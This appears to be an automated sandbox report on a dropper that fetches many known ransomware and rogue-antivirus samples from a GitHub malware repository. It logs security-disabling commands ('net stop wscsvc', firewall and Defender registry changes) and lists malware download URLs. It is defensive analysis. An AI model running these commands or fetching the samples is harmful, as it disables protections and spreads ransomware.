          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\07bb0738.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_0040E0E1 GetSystemTime,SystemTimeToFileTime,15_2_0040E0E1
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_00406860 lstrlenA,GlobalAlloc,GetVersionExA,MultiByteToWideChar,WideCharToMultiByte,CreateStreamOnHGlobal,15_2_00406860

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\WinDefend
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Windows\antivirus-platinum.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryTools
          Source: C:\Windows\antivirus-platinum.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSR
          Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
          Source: C:\Windows\antivirus-platinum.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from FirewallProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from FirewallProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiSpywareProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiSpywareProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiVirusProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiVirusProduct
          Source: Endermanch@Krotten.exe.0.drBinary or memory string: C:\WINDOWS\Cursors\avp.exe
          Source: Endermanch@Krotten.exe.0.drBinary or memory string: Photo.exeC:\WINDOWS\Cursors\avp.exe
          Source: Endermanch@Cerber5.exe, 00000017.00000003.497926104.00000000017E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: C:\Users\user\Desktop\Fantom.exe, type: DROPPED
          Source: Yara matchFile source: 47.0.586F.tmp.7ff769b10000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 47.0.586F.tmp.7ff769b10000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 47.0.586F.tmp.7ff769b10000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 47.2.586F.tmp.7ff769b10000.0.unpack, type: UNPACKEDPE
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: \\192.168.2.1\admin$\infpub.dat

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: C:\Users\user\Desktop\Fantom.exe, type: DROPPED
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          1
          Replication Through Removable Media
          111
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          911
          Disable or Modify Tools
          1
          Input Capture
          1
          System Time Discovery
          1
          Replication Through Removable Media
          1
          Archive Collected Data
          Exfiltration Over Other Network Medium13
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization3
          Inhibit System Recovery
          Default Accounts1
          Scripting
          2
          Windows Service
          1
          Access Token Manipulation
          1
          Scripting
          LSASS Memory11
          Peripheral Device Discovery
          Remote Desktop Protocol2
          Man in the Browser
          Exfiltration Over Bluetooth11
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts2
          Native API
          1
          Scheduled Task/Job
          2
          Windows Service
          21
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Input Capture
          Automated Exfiltration1
          Non-Standard Port
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          Scheduled Task/Job
          21
          Registry Run Keys / Startup Folder
          112
          Process Injection
          51
          Software Packing
          NTDS135
          System Information Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer4
          Non-Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud Accounts1
          Service Execution
          Network Logon Script1
          Scheduled Task/Job
          1
          DLL Side-Loading
          LSA Secrets2
          Network Share Discovery
          SSHKeyloggingData Transfer Size Limits25
          Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.common21
          Registry Run Keys / Startup Folder
          1
          File Deletion
          Cached Domain Credentials241
          Security Software Discovery
          VNCGUI Input CaptureExfiltration Over C2 Channel1
          Proxy
          Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items122
          Masquerading
          DCSync2
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Modify Registry
          Proc Filesystem31
          Virtualization/Sandbox Evasion
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)31
          Virtualization/Sandbox Evasion
          /etc/passwd and /etc/shadow1
          Application Window Discovery
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          Access Token Manipulation
          Network Sniffing1
          Remote System Discovery
          Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron112
          Process Injection
          Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
          Rundll32
          KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
          Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled Task2
          Indicator Removal on Host
          GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 712625 Sample: 07bb0738.exe Startdate: 29/09/2022 Architecture: WINDOWS Score: 100 129 www.vikingwebscanner.com 2->129 131 searchaccount.org 2->131 133 8 other IPs or domains 2->133 145 Snort IDS alert for network traffic 2->145 147 Multi AV Scanner detection for domain / URL 2->147 149 Malicious sample detected (through community Yara rule) 2->149 151 18 other signatures 2->151 10 07bb0738.exe 14 72 2->10         started        15 svchost.exe 2->15         started        17 svchost.exe 1 2->17         started        19 10 other processes 2->19 signatures3 process4 dnsIp5 141 raw.githubusercontent.com 10->141 143 github.com 10->143 115 C:\Users\user\Desktop\Fantom.exe, PE32 10->115 dropped 117 C:\Users\user\Desktopndermanch@Xyeta.exe, PE32 10->117 dropped 119 C:\...ndermanch@WinlockerVB6Blacksod.exe, PE32 10->119 dropped 121 65 other malicious files 10->121 dropped 183 Writes many files with high entropy 10->183 21 Endermanch@BadRabbit.exe 10->21         started        25 Endermanch@InfinityCrypt.exe 10->25         started        27 Endermanch@AntivirusPlatinum.exe 1 13 10->27         started        35 9 other processes 10->35 185 Changes security center settings (notifications, updates, antivirus, firewall) 15->185 29 MpCmdRun.exe 15->29         started        31 conhost.exe 17->31         started        33 conhost.exe 19->33         started        file6 signatures7 process8 dnsIp9 91 C:\Windows\infpub.dat, data 21->91 dropped 153 Antivirus detection for dropped file 21->153 155 Multi AV Scanner detection for dropped file 21->155 157 Machine Learning detection for dropped file 21->157 38 rundll32.exe 21->38         started        42 conhost.exe 21->42         started        103 12 other malicious files 25->103 dropped 159 Writes many files with high entropy 25->159 93 C:\Windows\antivirus-platinum.exe, PE32 27->93 dropped 95 C:\Windows\302746537.exe, PE32 27->95 dropped 105 2 other files (none is malicious) 27->105 dropped 161 Drops executables to the windows directory (C:\Windows) and starts them 27->161 44 302746537.exe 27->44         started        46 conhost.exe 29->46         started        135 93.107.12.20 VODAFONE-IRELAND-ASNIE Ireland 35->135 137 93.107.12.21 VODAFONE-IRELAND-ASNIE Ireland 35->137 139 104 other IPs or domains 35->139 97 C:\Users\user\AppData\Local\6AdwCleaner.exe, PE32 35->97 dropped 99 C:\Program Files (x86)\...\libltdl3.dll, PE32 35->99 dropped 101 C:\Program Files (x86)\...\avpc2009.exe, PE32 35->101 dropped 107 7 other files (5 malicious) 35->107 dropped 163 Creates an undocumented autostart registry key 35->163 165 Creates multiple autostart registry keys 35->165 167 Uses netsh to modify the Windows network and firewall settings 35->167 169 6 other signatures 35->169 48 6AdwCleaner.exe 35->48         started        51 avpc2009.exe 35->51         started        53 taskkill.exe 35->53         started        55 3 other processes 35->55 file10 signatures11 process12 dnsIp13 109 C:\Windows\dispci.exe, PE32 38->109 dropped 111 C:\Windows\cscc.dat, PE32+ 38->111 dropped 113 C:\Windows\586F.tmp, data 38->113 dropped 171 System process connects to network (likely due to code injection or exploit) 38->171 173 Connects to many different private IPs via SMB (likely to spread or exploit) 38->173 175 Connects to many different private IPs (likely to spread or exploit) 38->175 181 4 other signatures 38->181 57 cmd.exe 38->57         started        59 cmd.exe 38->59         started        61 cmd.exe 38->61         started        70 2 other processes 38->70 63 cmd.exe 44->63         started        123 www.vikingwebscanner.com 48->123 177 Antivirus detection for dropped file 48->177 179 Multi AV Scanner detection for dropped file 48->179 125 yandex.ru 51->125 127 google.ru 51->127 66 conhost.exe 53->66         started        68 conhost.exe 55->68         started        file14 signatures15 process16 signatures17 72 conhost.exe 57->72         started        74 schtasks.exe 57->74         started        85 2 other processes 59->85 87 2 other processes 61->87 193 Drops executables to the windows directory (C:\Windows) and starts them 63->193 195 Uses schtasks.exe or at.exe to add and modify task schedules 63->195 76 antivirus-platinum.exe 63->76         started        79 conhost.exe 63->79         started        81 regsvr32.exe 63->81         started        89 2 other processes 63->89 83 conhost.exe 70->83         started        process18 signatures19 187 Disables the Windows task manager (taskmgr) 76->187 189 Disables Windows system restore 76->189 191 Disables the Windows registry editor (regedit) 76->191

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          07bb0738.exe64%ReversingLabsWin32.Backdoor.Bladabhindi
          07bb0738.exe63%VirustotalBrowse
          07bb0738.exe24%MetadefenderBrowse
          07bb0738.exe100%AviraTR/Dropper.Gen
          07bb0738.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe100%AviraHEUR/AGEN.1224490
          C:\Users\user\Desktop\Endermanch@Cerber5.exe100%AviraHEUR/AGEN.1227089
          C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe100%AviraTR/Ransom.pfnaw
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe100%AviraTR/AD.FakeRean.mwfxa
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe100%AviraDR/Pasta.kdx
          C:\Users\user\Desktop\Endermanch@Antivirus.exe100%AviraTR/Dldr.FraudLoad.xerf
          C:\Users\user\Desktop\Endermanch@AnViPC2009.exe100%AviraDR/Agent.aq.122610
          C:\Users\user\Desktop\Endermanch@Birele.exe100%AviraTR/BAS.Samca.fyzpg
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe100%AviraTR/Genasom.wzara
          C:\Users\user\AppData\Local\6AdwCleaner.exe100%AviraJOKE/Agent.rlham
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe100%AviraPUA/HappyAV.A
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe100%AviraTR/Diskcoder.ezxim
          C:\Program Files (x86)\antiviruspc2009\avpc2009.exe100%AviraTR/Fake.avpc.94312
          C:\Users\user\Desktop\Endermanch@Cerber5.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@Birele.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe100%Joe Sandbox ML
          C:\Program Files (x86)\antiviruspc2009\avpc2009.exe62%ReversingLabsWin32.Rogue.FakeRean
          C:\Program Files (x86)\antiviruspc2009\avpc2009.exe56%MetadefenderBrowse
          C:\Program Files (x86)\antiviruspc2009\bzip2.dll2%ReversingLabs
          C:\Program Files (x86)\antiviruspc2009\bzip2.dll4%MetadefenderBrowse
          C:\Program Files (x86)\antiviruspc2009\libltdl3.dll0%ReversingLabs
          C:\Program Files (x86)\antiviruspc2009\libltdl3.dll4%MetadefenderBrowse
          C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll0%ReversingLabs
          C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll4%MetadefenderBrowse
          C:\Users\user\AppData\Local\6AdwCleaner.exe60%ReversingLabsWin32.Rogue.Wadebooc
          C:\Users\user\AppData\Local\6AdwCleaner.exe52%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@AnViPC2009.exe68%ReversingLabsWin32.Rogue.FakeRean
          C:\Users\user\Desktop\Endermanch@AnViPC2009.exe24%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Antivirus.exe86%ReversingLabsWin32.Trojan.CoreGuardAntivirus2009
          C:\Users\user\Desktop\Endermanch@Antivirus.exe60%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe78%ReversingLabsWin32.Trojan.Pasta
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe28%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe92%ReversingLabsWin32.Rogue.FakeRean
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe64%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe93%ReversingLabsWin32.Ransomware.BadRabbit
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe83%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Birele.exe86%ReversingLabsWin32.Ransomware.Genasom
          C:\Users\user\Desktop\Endermanch@Birele.exe78%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Cerber5.exe91%ReversingLabsWin32.Ransomware.Cerber
          C:\Users\user\Desktop\Endermanch@Cerber5.exe76%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe92%ReversingLabsWin32.Ransomware.Derialock
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe69%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe70%ReversingLabsWin32.Trojan.MintPorcupine
          C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe60%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe37%ReversingLabsWin32.PUA.HappyAV
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe36%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe85%ReversingLabsByteCode-MSIL.Ransomware.Infinity
          C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe60%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe85%ReversingLabsWin32.Trojan.Simda
          C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe64%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Krotten.exe96%ReversingLabsWin32.Trojan.Krotten
          C:\Users\user\Desktop\Endermanch@Krotten.exe86%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@LPS2019.exe59%ReversingLabsByteCode-MSIL.Trojan.Dnoper
          C:\Users\user\Desktop\Endermanch@LPS2019.exe24%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Movie.mpeg.exe95%ReversingLabsWin32.Trojan.Razy
          C:\Users\user\Desktop\Endermanch@Movie.mpeg.exe80%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@NavaShield.exe51%ReversingLabsWin32.Ransomware.Crypmod
          C:\Users\user\Desktop\Endermanch@NavaShield.exe20%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@NoMoreRansom.exe91%ReversingLabsWin32.Ransomware.Troldesh
          C:\Users\user\Desktop\Endermanch@NoMoreRansom.exe72%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@PCDefender.exe70%ReversingLabsWin32.Backdoor.Zapchast
          C:\Users\user\Desktop\Endermanch@PCDefender.exe28%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Petya.A.exe100%ReversingLabsWin32.Ransomware.Petya
          C:\Users\user\Desktop\Endermanch@Petya.A.exe84%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@PolyRansom.exe95%ReversingLabsWin32.Ransomware.VirLock
          C:\Users\user\Desktop\Endermanch@PolyRansom.exe82%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@RegistrySmart.exe35%ReversingLabsWin32.PUA.RegistryCleaner
          C:\Users\user\Desktop\Endermanch@RegistrySmart.exe20%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SE2011.exe93%ReversingLabsWin32.Rogue.CoreGuardAntivirus2009
          C:\Users\user\Desktop\Endermanch@SE2011.exe64%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SecurityCentral.exe88%ReversingLabsWin32.Rogue.FakeRean
          C:\Users\user\Desktop\Endermanch@SecurityCentral.exe80%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SecurityDefender.exe81%ReversingLabsWin32.Adware.AntimalwareDefender
          C:\Users\user\Desktop\Endermanch@SecurityDefender.exe56%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exe64%ReversingLabsWin32.Trojan.Graftor
          C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exe56%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SecurityScanner.exe81%ReversingLabsWin32.Rogue.FakePAV
          C:\Users\user\Desktop\Endermanch@SecurityScanner.exe72%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exe86%ReversingLabsWin32.Trojan.FakeSysdef
          C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exe72%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@VAV2008.exe63%ReversingLabsWin32.Rogue.FakeSecSen
          C:\Users\user\Desktop\Endermanch@VAV2008.exe20%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@ViraLock.exe95%ReversingLabsWin32.Ransomware.VirLock
          C:\Users\user\Desktop\Endermanch@ViraLock.exe83%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe95%ReversingLabsWin32.Ransomware.WannaCry
          C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe88%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exe45%ReversingLabsWin32.Ransomware.InfinityLock
          C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exe31%MetadefenderBrowse
          SourceDetectionScannerLabelLinkDownload
          14.0.Endermanch@Antivirus.exe.400000.0.unpack100%AviraTR/Dldr.FraudLoad.xerfDownload File
          20.0.Endermanch@Birele.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          26.0.avpc2009.exe.554540.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          26.0.avpc2009.exe.400000.0.unpack100%AviraTR/Fake.avpc.94312Download File
          23.0.Endermanch@Cerber5.exe.400000.3.unpack100%AviraHEUR/AGEN.1227089Download File
          14.0.Endermanch@Antivirus.exe.400000.3.unpack100%AviraTR/Dldr.FraudLoad.xerfDownload File
          16.0.Endermanch@AntivirusPro2017.exe.400000.3.unpack100%AviraTR/AD.FakeRean.mwfxaDownload File
          19.0.302746537.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          23.0.Endermanch@Cerber5.exe.400000.1.unpack100%AviraHEUR/AGEN.1227089Download File
          20.0.Endermanch@Birele.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          14.0.Endermanch@Antivirus.exe.400000.2.unpack100%AviraTR/Dldr.FraudLoad.xerfDownload File
          16.0.Endermanch@AntivirusPro2017.exe.400000.0.unpack100%AviraTR/AD.FakeRean.mwfxaDownload File
          50.0.antivirus-platinum.exe.400000.0.unpack100%AviraTR/Crypt.CFI.GenDownload File
          18.0.Endermanch@BadRabbit.exe.1300000.0.unpack100%AviraTR/ATRAPS.GenDownload File
          16.0.Endermanch@AntivirusPro2017.exe.400000.2.unpack100%AviraTR/AD.FakeRean.mwfxaDownload File
          20.0.Endermanch@Birele.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          23.0.Endermanch@Cerber5.exe.400000.0.unpack100%AviraHEUR/AGEN.1227089Download File
          18.2.Endermanch@BadRabbit.exe.1300000.1.unpack100%AviraTR/ATRAPS.GenDownload File
          18.0.Endermanch@BadRabbit.exe.1300000.3.unpack100%AviraTR/ATRAPS.GenDownload File
          23.0.Endermanch@Cerber5.exe.400000.2.unpack100%AviraHEUR/AGEN.1227089Download File
          18.0.Endermanch@BadRabbit.exe.1300000.2.unpack100%AviraTR/ATRAPS.GenDownload File
          14.0.Endermanch@Antivirus.exe.400000.1.unpack100%AviraTR/Dldr.FraudLoad.xerfDownload File
          16.0.Endermanch@AntivirusPro2017.exe.400000.1.unpack100%AviraTR/AD.FakeRean.mwfxaDownload File
          20.0.Endermanch@Birele.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          22.2.rundll32.exe.4530000.2.unpack100%AviraHEUR/AGEN.1234590Download File
          16.3.Endermanch@AntivirusPro2017.exe.2de0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          19.2.302746537.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          18.0.Endermanch@BadRabbit.exe.1300000.1.unpack100%AviraTR/ATRAPS.GenDownload File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://dynamic.t0%URL Reputationsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip0%VirustotalBrowse
          http://192.168.2.10%VirustotalBrowse
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip0%Avira URL Cloudsafe
